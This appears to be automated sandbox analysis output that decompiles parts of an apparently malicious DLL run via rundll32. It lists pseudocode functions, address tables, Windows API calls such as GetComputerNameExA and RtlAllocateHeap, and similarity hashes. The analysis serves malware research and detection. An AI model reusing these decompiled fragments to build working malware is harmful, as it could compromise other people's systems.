					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                  0x04b394b4
                                                  0x04b394b8
                                                  0x04b394ba
                                                  0x04b394bb
                                                  0x04b394c3
                                                  0x04b394c3
                                                  0x04b394c7
                                                  0x00000000
                                                  0x00000000
                                                  0x04b394be
                                                  0x04b394bf
                                                  0x04b394c2
                                                  0x04b394c2
                                                  0x04b394cf
                                                  0x04b394d6
                                                  0x04b394da
                                                  0x04b394e2
                                                  0x04b394e8
                                                  0x04b394ea
                                                  0x04b394ef
                                                  0x04b394f3
                                                  0x04b394f5
                                                  0x04b394f8
                                                  0x04b394ff
                                                  0x04b394ff
                                                  0x04b39509
                                                  0x04b3950c
                                                  0x04b3950f
                                                  0x04b3950f
                                                  0x04b3951b
                                                  0x04b3951b
                                                  0x04b39528

                                                  APIs
                                                  • StrChrA.SHLWAPI(?,00000020,00000000,06AF95AC,?,04B323DE,?,04B37634,06AF95AC,?,04B323DE), ref: 04B394C3
                                                  • StrTrimA.KERNELBASE(?,04B3C2A4,00000002,?,04B323DE,?,04B37634,06AF95AC,?,04B323DE), ref: 04B394E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,04B323DE,?,04B37634,06AF95AC,?,04B323DE), ref: 04B394ED
                                                  • StrTrimA.SHLWAPI(00000001,04B3C2A4,?,04B323DE,?,04B37634,06AF95AC,?,04B323DE), ref: 04B394FF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: f3410c50f84d7a4155302bf6315e49ef7c13fe309127a4963fe311c4a95fcb73
                                                  • Instruction ID: 96b2b6dea34955121e58fd43a92f5a24473f7ff3a38c1a15bca07c53b7aa0781
                                                  • Opcode Fuzzy Hash: f3410c50f84d7a4155302bf6315e49ef7c13fe309127a4963fe311c4a95fcb73
                                                  • Instruction Fuzzy Hash: 1001B5B16053116FD3309E6B8C49F2B7F9CEF85652F120599F885D7240DBB4DC0196A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B373FD, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 373 4b373fd-4b37417 call 4b3a72d 376 4b37419 373->376 377 4b3741c-4b3743e call 4b31262 373->377 376->377 380 4b37444-4b3745e StrToIntExW 377->380 381 4b374fd-4b37502 377->381 384 4b37464-4b37480 call 4b37cb8 380->384 385 4b374ed-4b374ef 380->385 382 4b37504 call 4b31f99 381->382 383 4b37509-4b3750f 381->383 382->383 386 4b374f0-4b374fb HeapFree 384->386 390 4b37482-4b3749b call 4b389d6 384->390 385->386 386->381 393 4b374bd-4b374d9 call 4b32659 390->393 394 4b3749d-4b374a4 390->394 398 4b374de-4b374eb HeapFree 393->398 394->393 395 4b374a6-4b374b8 call 4b389d6 394->395 395->393 398->386
                                                  C-Code - Quality: 100%
                                                  			E04B373FD(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04B3A72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4b3d27c; // 0x1fba5a8
				_t4 = _t24 + 0x4b3ede0; // 0x6af9388
				_t5 = _t24 + 0x4b3ed88; // 0x4f0053
				_t26 = E04B31262( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4b3d27c; // 0x1fba5a8
						_t11 = _t32 + 0x4b3edd4; // 0x6af937c
						_t48 = _t11;
						_t12 = _t32 + 0x4b3ed88; // 0x4f0053
						_t55 = E04B37CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x4b3d27c; // 0x1fba5a8
							_t13 = _t35 + 0x4b3ee1e; // 0x30314549
							if(E04B389D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x4b3d25c - 6;
								if( *0x4b3d25c <= 6) {
									_t42 =  *0x4b3d27c; // 0x1fba5a8
									_t15 = _t42 + 0x4b3ec2a; // 0x52384549
									E04B389D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x4b3d27c; // 0x1fba5a8
							_t17 = _t38 + 0x4b3ee18; // 0x6af93c0
							_t18 = _t38 + 0x4b3edf0; // 0x680043
							_t40 = E04B32659(_v8, 0x80000001, _t55, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x4b3d238, 0, _t55);
						}
					}
					HeapFree( *0x4b3d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04B31F99(_t54);
				}
				return _t45;
			}


















                                                  0x04b373fd
                                                  0x04b3740d
                                                  0x04b37410
                                                  0x04b37417
                                                  0x04b37419
                                                  0x04b37419
                                                  0x04b3741c
                                                  0x04b37421
                                                  0x04b37428
                                                  0x04b37435
                                                  0x04b3743a
                                                  0x04b3743e
                                                  0x04b3744c
                                                  0x04b3745a
                                                  0x04b3745e
                                                  0x04b374ef
                                                  0x04b374ef
                                                  0x04b37464
                                                  0x04b37464
                                                  0x04b37469
                                                  0x04b37469
                                                  0x04b37470
                                                  0x04b3747c
                                                  0x04b3747e
                                                  0x04b37480
                                                  0x04b37482
                                                  0x04b37489
                                                  0x04b3749b
                                                  0x04b3749d
                                                  0x04b374a4
                                                  0x04b374a6
                                                  0x04b374ad
                                                  0x04b374b8
                                                  0x04b374b8
                                                  0x04b374a4
                                                  0x04b374bd
                                                  0x04b374c2
                                                  0x04b374c9
                                                  0x04b374d9
                                                  0x04b374e7
                                                  0x04b374e9
                                                  0x04b374e9
                                                  0x04b37480
                                                  0x04b374fb
                                                  0x04b374fb
                                                  0x04b374fd
                                                  0x04b37502
                                                  0x04b37504
                                                  0x04b37504
                                                  0x04b3750f

                                                  APIs
                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,06AF9388,00000000,?,7519F710,00000000,7519F730), ref: 04B3744C
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,06AF93C0,?,00000000,30314549,00000014,004F0053,06AF937C), ref: 04B374E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04B36814), ref: 04B374FB
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: a36ad7b3803916c7f1d9c78371e14f47c9495fbbbe5c7611ecd982d81d7bec30
                                                  • Instruction ID: 9a48cb5ad8092a1e3e641441c4c1e0e20f9d443a459869b7aa9aaca78af779f3
                                                  • Opcode Fuzzy Hash: a36ad7b3803916c7f1d9c78371e14f47c9495fbbbe5c7611ecd982d81d7bec30
                                                  • Instruction Fuzzy Hash: 37314FB1901118AFEF11DBAADC84E9E7BACEB54706F158096B500A7161D774FE08DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B38504, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 399 4b38504-4b38526 400 4b38546-4b3854e RtlAllocateHeap 399->400 401 4b38528-4b38530 RtlAllocateHeap 399->401 402 4b38550-4b3855d call 4b3a279 400->402 403 4b38566-4b38568 400->403 401->403 404 4b38532-4b3853f call 4b38b94 401->404 408 4b38562-4b38564 402->408 406 4b38569-4b3856b 403->406 411 4b38544 404->411 409 4b385a9 406->409 410 4b3856d-4b3858e call 4b32496 call 4b3a66e 406->410 408->406 413 4b385af-4b385b5 409->413 417 4b38590-4b385a3 call 4b3a1b0 HeapFree 410->417 418 4b385b8-4b385c9 410->418 411->408 417->409 418->413 419 4b385cb-4b385d2 418->419 419->413
                                                  C-Code - Quality: 54%
                                                  			E04B38504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x4b3d340; // 0x6af8d39
				_push(0x800);
				_push(0);
				_push( *0x4b3d238);
				if( *0x4b3d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x4b3d24c =  *0x4b3d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04B32496(_t44, _t40);
						_t18 = E04B3A66E(_t37, _t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x4b3d24c < 5) {
								 *0x4b3d24c =  *0x4b3d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E04B3A1B0();
						HeapFree( *0x4b3d238, 0, _t40);
						goto L10;
					}
					_t24 = E04B3A279(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E04B38B94(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}











                                                  0x04b38504
                                                  0x04b38507
                                                  0x04b38508
                                                  0x04b38512
                                                  0x04b38519
                                                  0x04b3851e
                                                  0x04b38520
                                                  0x04b38526
                                                  0x04b3854e
                                                  0x04b38566
                                                  0x04b38568
                                                  0x04b38569
                                                  0x04b3856b
                                                  0x04b385a9
                                                  0x04b385a9
                                                  0x04b385af
                                                  0x04b385b5
                                                  0x04b385b5
                                                  0x04b3856d
                                                  0x04b38573
                                                  0x04b38576
                                                  0x04b38585
                                                  0x04b38587
                                                  0x04b3858e
                                                  0x04b385c2
                                                  0x04b385c7
                                                  0x04b385c9
                                                  0x04b385cb
                                                  0x04b385cb
                                                  0x00000000
                                                  0x04b385c9
                                                  0x04b38590
                                                  0x04b38595
                                                  0x04b385a3
                                                  0x00000000
                                                  0x04b385a3
                                                  0x04b3855d
                                                  0x04b38562
                                                  0x04b38562
                                                  0x00000000
                                                  0x04b38562
                                                  0x04b38530
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3853f
                                                  0x00000000

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04B38528
                                                    • Part of subcall function 04B38B94: GetTickCount.KERNEL32 ref: 04B38BA8
                                                    • Part of subcall function 04B38B94: wsprintfA.USER32 ref: 04B38BF8
                                                    • Part of subcall function 04B38B94: wsprintfA.USER32 ref: 04B38C15
                                                    • Part of subcall function 04B38B94: wsprintfA.USER32 ref: 04B38C41
                                                    • Part of subcall function 04B38B94: HeapFree.KERNEL32(00000000,?), ref: 04B38C53
                                                    • Part of subcall function 04B38B94: wsprintfA.USER32 ref: 04B38C74
                                                    • Part of subcall function 04B38B94: HeapFree.KERNEL32(00000000,?), ref: 04B38C84
                                                    • Part of subcall function 04B38B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B38CB2
                                                    • Part of subcall function 04B38B94: GetTickCount.KERNEL32 ref: 04B38CC3
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 04B38546
                                                  • HeapFree.KERNEL32(00000000,00000002,04B3685F,?,04B3685F,00000002,?,?,04B32417,?), ref: 04B385A3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                  • String ID:
                                                  • API String ID: 1676223858-0
                                                  • Opcode ID: 7d43b2663e25cf6973776f732885b44df349c169dd626a63b1305fb72d735299
                                                  • Instruction ID: 290e588105af0c5c1bba6e2ce21685f4e2fa9ee0f20c0916e1e3a6e709d50b00
                                                  • Opcode Fuzzy Hash: 7d43b2663e25cf6973776f732885b44df349c169dd626a63b1305fb72d735299
                                                  • Instruction Fuzzy Hash: 3A213E76211204ABEB11EF96DC84A9E37FCEB49746F114056F901A7140DB74ED409BB2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B33DD9, Relevance: 3.9, APIs: 3, Instructions: 155stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 90%
                                                  			E04B33DD9(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x4b3d27c; // 0x1fba5a8
				_t5 = _t40 + 0x4b3ee40; // 0x410025
				_t85 = E04B36A12(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E04B39039(_v16);
					goto L24;
				}
				if(E04B3A72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E04B3809F(0,  *0x4b3d33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x4b3d27c; // 0x1fba5a8
					_t11 = _t52 + 0x4b3e81a; // 0x65696c43
					_t55 = E04B3809F(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E04B36BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E04B39039(_t87);
					}
					if(_t80 != 0) {
						L17:
						E04B39039(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E04B31F99(_t86);
						}
						goto L22;
					} else {
						if(( *0x4b3d260 & 0x00000001) == 0) {
							L14:
							E04B38F83(_t80, _v88, _v84,  *0x4b3d270, 0);
							_t80 = E04B31C74(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E04B342EA( &_v40, 0);
							}
							E04B39039(_v88);
							goto L17;
						}
						_t67 =  *0x4b3d27c; // 0x1fba5a8
						_t18 = _t67 + 0x4b3e823; // 0x65696c43
						_t70 = E04B3809F(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E04B36BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E04B39039(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}


























                                                  0x04b33deb
                                                  0x04b33dee
                                                  0x04b33df5
                                                  0x04b33dfb
                                                  0x04b33dfc
                                                  0x04b33dfd
                                                  0x04b33dfe
                                                  0x04b33dff
                                                  0x04b33e00
                                                  0x04b33e08
                                                  0x04b33e14
                                                  0x04b33e18
                                                  0x04b33e1b
                                                  0x04b33f6b
                                                  0x04b33f6e
                                                  0x04b33f72
                                                  0x04b33f72
                                                  0x04b33e2d
                                                  0x04b33e35
                                                  0x04b33f5e
                                                  0x04b33f5f
                                                  0x04b33f62
                                                  0x00000000
                                                  0x04b33f62
                                                  0x04b33e47
                                                  0x04b33e49
                                                  0x04b33e49
                                                  0x04b33e54
                                                  0x04b33e5b
                                                  0x04b33e5e
                                                  0x04b33f4d
                                                  0x00000000
                                                  0x04b33e64
                                                  0x04b33e64
                                                  0x04b33e69
                                                  0x04b33e72
                                                  0x04b33e77
                                                  0x04b33e80
                                                  0x04b33ea3
                                                  0x04b33e82
                                                  0x04b33e98
                                                  0x04b33e9a
                                                  0x04b33e9a
                                                  0x04b33ea6
                                                  0x04b33f41
                                                  0x04b33f44
                                                  0x04b33f4e
                                                  0x04b33f4e
                                                  0x04b33f53
                                                  0x04b33f55
                                                  0x04b33f55
                                                  0x00000000
                                                  0x04b33eac
                                                  0x04b33eb3
                                                  0x04b33ef4
                                                  0x04b33f05
                                                  0x04b33f1b
                                                  0x04b33f1f
                                                  0x04b33f24
                                                  0x04b33f2a
                                                  0x04b33f37
                                                  0x04b33f37
                                                  0x04b33f3c
                                                  0x00000000
                                                  0x04b33f3c
                                                  0x04b33eb5
                                                  0x04b33eba
                                                  0x04b33ec3
                                                  0x04b33ec8
                                                  0x04b33ecc
                                                  0x04b33eef
                                                  0x04b33ece
                                                  0x04b33ee4
                                                  0x04b33ee6
                                                  0x04b33ee6
                                                  0x04b33ef2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b33ef2
                                                  0x04b33ea6

                                                  APIs
                                                  • memset.NTDLL ref: 04B33DEE
                                                    • Part of subcall function 04B36A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04B33E14,00410025,00000005,?,00000000), ref: 04B36A23
                                                    • Part of subcall function 04B36A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04B36A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04B33E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 04B33E2D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: 6f555ae909d2431c02d9c51492136221280b522d7bdcb1d06490813eaa9d9cc8
                                                  • Instruction ID: bac4cd52ed9d2d1e59a8f75473fb080e9817a8302bcf5c5655c764dd36d8340b
                                                  • Opcode Fuzzy Hash: 6f555ae909d2431c02d9c51492136221280b522d7bdcb1d06490813eaa9d9cc8
                                                  • Instruction Fuzzy Hash: 01412072A01218ABEB11EFF6DC849DF7BFCEF08746F4045A6B905A7110D675ED448BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B39152, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 75%
                                                  			E04B39152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04B33AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4b3d27c; // 0x1fba5a8
						_t20 = _t68 + 0x4b3e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04B37C14(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                  0x04b39158
                                                  0x04b3915b
                                                  0x04b3916b
                                                  0x04b39174
                                                  0x04b39178
                                                  0x04b39246
                                                  0x04b3924c
                                                  0x04b3924c
                                                  0x04b39192
                                                  0x04b39197
                                                  0x04b3919b
                                                  0x04b391a1
                                                  0x04b391a6
                                                  0x04b391ad
                                                  0x04b391bc
                                                  0x04b391bc
                                                  0x04b391c0
                                                  0x04b391c2
                                                  0x04b391ce
                                                  0x04b391d9
                                                  0x04b391e4
                                                  0x04b391e8
                                                  0x04b391f2
                                                  0x04b391f6
                                                  0x04b391f8
                                                  0x04b391fd
                                                  0x04b39204
                                                  0x04b39214
                                                  0x04b39214
                                                  0x04b391fd
                                                  0x04b391f6
                                                  0x04b39216
                                                  0x04b3921b
                                                  0x04b39220
                                                  0x04b39220
                                                  0x04b39226
                                                  0x04b3922c
                                                  0x04b39231
                                                  0x04b39231
                                                  0x04b39236
                                                  0x04b3923b
                                                  0x04b3923b
                                                  0x04b39236
                                                  0x04b391c0
                                                  0x04b3923d
                                                  0x04b39243
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 04B33AEF: SysAllocString.OLEAUT32(80000002), ref: 04B33B46
                                                    • Part of subcall function 04B33AEF: SysFreeString.OLEAUT32(00000000), ref: 04B33BAB
                                                  • SysFreeString.OLEAUT32(?), ref: 04B39231
                                                  • SysFreeString.OLEAUT32(04B31885), ref: 04B3923B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 986138563-0
                                                  • Opcode ID: 39b44fe33f8bddfdd9d2524ecf7b1f4dca65cb8404a9c911d65029f5e8942ee7
                                                  • Instruction ID: 159e37089587ac68183214bbbdf5cbf1b1ec086a623b5e731895940ad9bbf2c4
                                                  • Opcode Fuzzy Hash: 39b44fe33f8bddfdd9d2524ecf7b1f4dca65cb8404a9c911d65029f5e8942ee7
                                                  • Instruction Fuzzy Hash: 58313AB2900518AFCF21DFAACC88C9BBB79EBC97417154698F8159B210D671AD51CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B31A03, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(04B38B1E), ref: 04B31A1D
                                                    • Part of subcall function 04B39152: SysFreeString.OLEAUT32(?), ref: 04B39231
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B31A5D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 986138563-0
                                                  • Opcode ID: 753901d8e05466d0f75f99d363e471834e7f76c725267952e3cec180fae06429
                                                  • Instruction ID: 2928b040217529f541f24d90159a292604f9dd3bf370b359c5f07b035907e437
                                                  • Opcode Fuzzy Hash: 753901d8e05466d0f75f99d363e471834e7f76c725267952e3cec180fae06429
                                                  • Instruction Fuzzy Hash: BC014F7250050EBBDB119FAAC80899FBBB9EF58312B014062FA05A7110E774EE199BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B354BC, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E04B354BC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04B32049(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04B39039(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                  0x04b354c1
                                                  0x04b354cc
                                                  0x04b354ce
                                                  0x04b354d4
                                                  0x04b354d6
                                                  0x04b354db
                                                  0x04b354e4
                                                  0x04b354e8
                                                  0x04b354f1
                                                  0x04b354f5
                                                  0x04b35504
                                                  0x04b354f7
                                                  0x04b354f8
                                                  0x04b354fd
                                                  0x04b354fd
                                                  0x04b354f5
                                                  0x04b354e8
                                                  0x04b3550d

                                                  APIs
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,04B3A306,7519F710,00000000,?,?,04B3A306), ref: 04B354D4
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,04B3A306,04B3A307,?,?,04B3A306), ref: 04B354F1
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
